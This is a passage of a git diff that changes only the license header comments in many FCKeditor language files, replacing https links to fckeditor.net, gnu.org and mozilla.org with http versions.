- * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/fr.js b/admin/FCKeditor/editor/lang/fr.js index 8b40cf9..d30afce 100755 --- a/admin/FCKeditor/editor/lang/fr.js +++ b/admin/FCKeditor/editor/lang/fr.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/gl.js b/admin/FCKeditor/editor/lang/gl.js index e59386b..33d8b2d 100755 --- a/admin/FCKeditor/editor/lang/gl.js +++ b/admin/FCKeditor/editor/lang/gl.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/he.js b/admin/FCKeditor/editor/lang/he.js index dd2d359..4ba795d 100755 --- a/admin/FCKeditor/editor/lang/he.js +++ b/admin/FCKeditor/editor/lang/he.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/hi.js b/admin/FCKeditor/editor/lang/hi.js index 6878f07..431017f 100755 --- a/admin/FCKeditor/editor/lang/hi.js +++ b/admin/FCKeditor/editor/lang/hi.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/hr.js b/admin/FCKeditor/editor/lang/hr.js index 9850f6c..d22b3b0 100755 --- a/admin/FCKeditor/editor/lang/hr.js +++ b/admin/FCKeditor/editor/lang/hr.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/hu.js b/admin/FCKeditor/editor/lang/hu.js index ecab6e0..fa3fffb 100755 --- a/admin/FCKeditor/editor/lang/hu.js +++ b/admin/FCKeditor/editor/lang/hu.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/it.js b/admin/FCKeditor/editor/lang/it.js index 71d7170..fa1685f 100755 --- a/admin/FCKeditor/editor/lang/it.js +++ b/admin/FCKeditor/editor/lang/it.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/ja.js b/admin/FCKeditor/editor/lang/ja.js index dc9bb19..0efd5c4 100755 --- a/admin/FCKeditor/editor/lang/ja.js +++ b/admin/FCKeditor/editor/lang/ja.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/km.js b/admin/FCKeditor/editor/lang/km.js index 90efe00..348fd87 100755 --- a/admin/FCKeditor/editor/lang/km.js +++ b/admin/FCKeditor/editor/lang/km.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/ko.js b/admin/FCKeditor/editor/lang/ko.js index ce2ec1c..fa1a3fa 100755 --- a/admin/FCKeditor/editor/lang/ko.js +++ b/admin/FCKeditor/editor/lang/ko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/lt.js b/admin/FCKeditor/editor/lang/lt.js index ae32e2e..06f5bd8 100755 --- a/admin/FCKeditor/editor/lang/lt.js +++ b/admin/FCKeditor/editor/lang/lt.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/lv.js b/admin/FCKeditor/editor/lang/lv.js index 297b067..ec66ee1 100755 --- a/admin/FCKeditor/editor/lang/lv.js +++ b/admin/FCKeditor/editor/lang/lv.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/mn.js b/admin/FCKeditor/editor/lang/mn.js index 96e594b..ba0bfe7 100755 --- a/admin/FCKeditor/editor/lang/mn.js +++ b/admin/FCKeditor/editor/lang/mn.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/ms.js b/admin/FCKeditor/editor/lang/ms.js index 12de28b..fbbe1e3 100755 --- a/admin/FCKeditor/editor/lang/ms.js +++ b/admin/FCKeditor/editor/lang/ms.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/nb.js b/admin/FCKeditor/editor/lang/nb.js index c3315c3..78fc2fe 100755 --- a/admin/FCKeditor/editor/lang/nb.js +++ b/admin/FCKeditor/editor/lang/nb.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/nl.js b/admin/FCKeditor/editor/lang/nl.js index ee03d0d..2f84834 100755 --- a/admin/FCKeditor/editor/lang/nl.js +++ b/admin/FCKeditor/editor/lang/nl.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/no.js b/admin/FCKeditor/editor/lang/no.js index 158909b..a05162e 100755 --- a/admin/FCKeditor/editor/lang/no.js +++ b/admin/FCKeditor/editor/lang/no.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/pl.js b/admin/FCKeditor/editor/lang/pl.js index 129e9ae..291e95a 100755 --- a/admin/FCKeditor/editor/lang/pl.js +++ b/admin/FCKeditor/editor/lang/pl.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/pt-br.js b/admin/FCKeditor/editor/lang/pt-br.js index 26218a7..d04c369 100755 --- a/admin/FCKeditor/editor/lang/pt-br.js +++ b/admin/FCKeditor/editor/lang/pt-br.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/pt.js b/admin/FCKeditor/editor/lang/pt.js index c6488c3..b80ebf6 100755 --- a/admin/FCKeditor/editor/lang/pt.js +++ b/admin/FCKeditor/editor/lang/pt.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/ro.js b/admin/FCKeditor/editor/lang/ro.js index cfede15..06bc659 100755 --- a/admin/FCKeditor/editor/lang/ro.js +++ b/admin/FCKeditor/editor/lang/ro.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/ru.js b/admin/FCKeditor/editor/lang/ru.js index d9244de..ed44c58 100755 --- a/admin/FCKeditor/editor/lang/ru.js +++ b/admin/FCKeditor/editor/lang/ru.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/sk.js b/admin/FCKeditor/editor/lang/sk.js index 3700c50..55cf55b 100755 --- a/admin/FCKeditor/editor/lang/sk.js +++ b/admin/FCKeditor/editor/lang/sk.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/sl.js b/admin/FCKeditor/editor/lang/sl.js index f1018a3..2430922 100755 --- a/admin/FCKeditor/editor/lang/sl.js +++ b/admin/FCKeditor/editor/lang/sl.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/sr-latn.js b/admin/FCKeditor/editor/lang/sr-latn.js index bc5020c..8fdee61 100755 --- a/admin/FCKeditor/editor/lang/sr-latn.js +++ b/admin/FCKeditor/editor/lang/sr-latn.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/sr.js b/admin/FCKeditor/editor/lang/sr.js index 2a4ae19..e0b20b0 100755 --- a/admin/FCKeditor/editor/lang/sr.js +++ b/admin/FCKeditor/editor/lang/sr.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/sv.js b/admin/FCKeditor/editor/lang/sv.js index 6275e63..82231c4 100755 --- a/admin/FCKeditor/editor/lang/sv.js +++ b/admin/FCKeditor/editor/lang/sv.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/th.js b/admin/FCKeditor/editor/lang/th.js index d697cc5..1ef95d3 100755 --- a/admin/FCKeditor/editor/lang/th.js +++ b/admin/FCKeditor/editor/lang/th.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/tr.js b/admin/FCKeditor/editor/lang/tr.js index c8f9b75..ae0b277 100755 --- a/admin/FCKeditor/editor/lang/tr.js +++ b/admin/FCKeditor/editor/lang/tr.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/uk.js b/admin/FCKeditor/editor/lang/uk.js index 080bb5e..7c14bf8 100755 --- a/admin/FCKeditor/editor/lang/uk.js +++ b/admin/FCKeditor/editor/lang/uk.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/vi.js b/admin/FCKeditor/editor/lang/vi.js index a729f8d..b096b18 100755 --- a/admin/FCKeditor/editor/lang/vi.js +++ b/admin/FCKeditor/editor/lang/vi.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * 